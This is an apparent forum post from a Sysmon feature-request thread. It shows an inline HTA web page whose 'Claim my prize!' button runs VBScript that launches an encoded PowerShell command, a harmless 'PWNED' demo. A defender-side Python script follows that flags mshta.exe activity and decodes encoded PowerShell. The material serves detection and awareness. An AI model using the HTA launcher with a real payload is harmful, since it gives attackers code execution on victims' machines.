Author: GregAskew
Subject: Sysmon Feature Request: Log Source of DCOM Calls
Posted: 14 April 2018 at 5:54pm
It doesn't have to be a downloaded .hta. It can be in-line in an HTML web page or HTML email.
<!DOCTYPE html>
<html>
<head>
<HTA:APPLICATION ID="host" BORDER="thin" BORDERSTYLE="complex" maximizeButton="yes" minimizeButton="yes" scroll="no"/>
<title>Sample</title>
</head>
<!-- Fires when the element with id="prize" is clicked; the -e argument is
     UTF-16LE base64 for: Write-Host "PWNED"; read-host -->
<script for="prize" event="onClick" language="VBScript">
Dim notMal
Set notMal = CreateObject("WScript.Shell")
notMal.Run "powershell.exe -e VwByAGkAdABlAC0ASABvAHMAdAAgACIAUABXAE4ARQBEACIAOwAgAHIAZQBhAGQALQBoAG8AcwB0AA=="
</script>
<body>
<p>
You're our millionth victim!
</p>
<p>
<form>
<input type="button" id="prize" value="Claim my prize!"/>
</form>
</p>
</body>
</html>
Allowing mshta.exe to run is a sure-fire way to allow adversaries a foothold in your environment.
Source:
https://www.fireeye.com/content/dam/collateral/en/mtrends-2018.pdf
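A defender-side triage of Sysmon process-creation (Event ID 1) records for the mshta.exe pattern the post describes, added here as an example and not part of the original post. The event records are constructed; the field names (Image, ParentImage, CommandLine) follow Sysmon's, and the -EncodedCommand decoding assumes PowerShell's UTF-16LE base64 convention.

```python
import base64
import re

# Constructed Sysmon Event ID 1 records as a SIEM might present them after
# parsing. The second one mirrors the HTA sample above: mshta.exe spawning
# powershell.exe with an encoded command.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\OUTLOOK.EXE",
     "CommandLine": r'mshta.exe "C:\Users\u\AppData\Local\Temp\prize.hta"'},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "powershell.exe -e VwByAGkAdABlAC0ASABvAHMAdAAgACIAUABXAE4ARQBEACIAOwAgAHIAZQBhAGQALQBoAG8AcwB0AA=="},
    {"Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "notepad.exe"},
]

# powershell.exe accepts unambiguous prefixes of -EncodedCommand (-e, -ec, -enc).
ENCODED_FLAG = re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+(\S+)", re.IGNORECASE)


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or None if absent or malformed."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def is_mshta(path):
    """True if the image path's file name is mshta.exe (case-insensitive)."""
    return path.lower().rsplit("\\", 1)[-1] == "mshta.exe"


def triage(events):
    """Flag mshta.exe launches, children of mshta.exe, and encoded PowerShell."""
    findings = []
    for ev in events:
        reasons = []
        if is_mshta(ev["Image"]):
            reasons.append("mshta.exe executed")
        if is_mshta(ev["ParentImage"]):
            reasons.append("child process spawned by mshta.exe")
        decoded = decode_encoded_command(ev["CommandLine"])
        if decoded is not None:
            reasons.append("encoded PowerShell: " + decoded)
        if reasons:
            findings.append((ev["Image"], reasons))
    return findings
```

Running `triage(SAMPLE_EVENTS)` flags the first two records and leaves notepad.exe alone; the decoded command shows the analyst what the HTA actually ran.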